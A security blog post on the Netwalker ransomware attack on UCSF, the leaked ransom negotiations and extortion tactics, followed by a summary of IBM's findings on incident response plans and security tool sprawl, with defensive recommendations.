Having dealt with ransomware attacks for years, not much surprises me when a new attack is announced. The attack against the University of California San Francisco (UCSF) was no different. The ransomware was a variant called Netwalker which Sophos analyzed in great detail in May. The threat group deploying this ransomware had already been observed targeting large organizations with special emphasis on gathering system administrator credentials; the malicious actors then used a variety of mechanisms to move laterally. This could be internal software such as TeamViewer or built-in programming languages like PowerShell which helped them avoid detection. The Sophos analysis details these mechanisms in a the MITRE ATT&CK matrix section of its report. There was also a possibility that the initial infection was via a successful phishing attack. What drew my attention to this attack was two pieces of information:
First, The fact that UCSF is a medical facility and some of the infected servers were in the School of Medicine. UCSF stated that this infection did not affect any of their COVID research but one would have to assume this research was a target. The Netwalker threat group did not join a previous cyber criminal declaration that promised to avoid attacking institutions fighting the coronavirus pandemic.
The second item that really grabbed my attention was the fact that the ransom negotiations between a negotiator acting on behalf of UCSF and the ransomware threat group were conducted in a live chat on the dark web. The BBC published what it said were extracts of live chat messages of these negotiations. It is also clear that the BBC was made aware of these messages by the threat group themselves. This was an attempt by the Netwalker group to use the news media to increase pressure on UCSF to pay the ransom.
This fits the buzz that Ransomware groups are constantly looking for new revenue streams. Originally they relied primarily on ransom payments to keep funding additional attacks against new victims. Now they are also demanding money from companies to prevent their data from being leaked onto public sites, and there have even been attempts by ransomware actors to embarrass companies long after a data breach by reporting the data breach to regulators or other compliance organizations. Any action that these groups can do to get money out of an organization is typically on the table. Ransomware will only continue to grow until we can make it less lucrative and stop paying money to these criminals. As long as payments continue, the amount of money being demanded will continue to rise. So what can we do? The deployment of better tools is one step towards a more secure enterprise, but this is not just about technology. In fact, IBM Security just produced a report showing that most organizations have tools already in place, but may have too many tools. Too much information is as bad as too little. And without a coherent and tested Incident Response Plan, any tool set doomed to fail when a crises occurs. Some key take aways from this report:
"First...51% of respondents said that their Computer Security Incident Response Plans (CSIRPs) were informal or ad-hoc, or simply not applied consistently across the enterprise. This lack of consistency translates into real money. Organizations that have incident response teams and extensively test their response plans spend an average of $1.2 million less on data breaches than those who don't have these methods in place, according to IBM."
Second, instead of having too few security products, many organizations have too many. Almost 30% of those polled said they use more than 50 separate security solutions and technologies, while 45% use more than 20 tools to investigate and respond to a cybersecurity incident. Further, many said that each incident to which they responded required coordination across an average of 19 different tools.
Third, even among organizations with a CSIRP, only 33% had playbooks for specific types of attacks. Among those, the most common playbooks were for DDoS attacks and malware. With ransomware on the rise, less than half of organizations with playbooks had one designed for a ransomware attack. Having predefined playbooks to counter common types of attacks provides organizations with a consistent and repeatable plan of defense.
It isn’t about more tools – it is about using the correct tool and becoming experts at that tool. It is about integrated tool sets that are simpler to use and provide usable data to the operators or automates some security functions. This is where machine learning analytics will slowly become more useful. The IBM Report ends with the following key findings.
- Implement an enterprise-wide Computer Security Incident Response Plan (CSIRP) to minimize business disruption
- Tailor response plans to specific attacks in your industry.
- Embrace interoperability to increase visibility and reduce complexity
- Invest in technologies to accelerate incident response
- Align your security and privacy teams
- Formalize C-level/board reporting to raise the visibility of the organization’s cyber resilience
Let us all learn from these attacks and not be the next victim. Work with tech companies and partners to ensure that your security tools are actually adding value to your operations.
Hello, i think that i saw you visited my website thus i came to “return the favor”.I’mtrying to find things to enhance my website!I supposeits ok to use some of your ideas!!
Very good site you have here but I was curious about if you knew of any discussion boards that cover the same topics discussed in this article?I’d really like to be a part of group where I can get advice from other experienced people that share thesame interest. If you have any suggestions, please let me know.Kudos!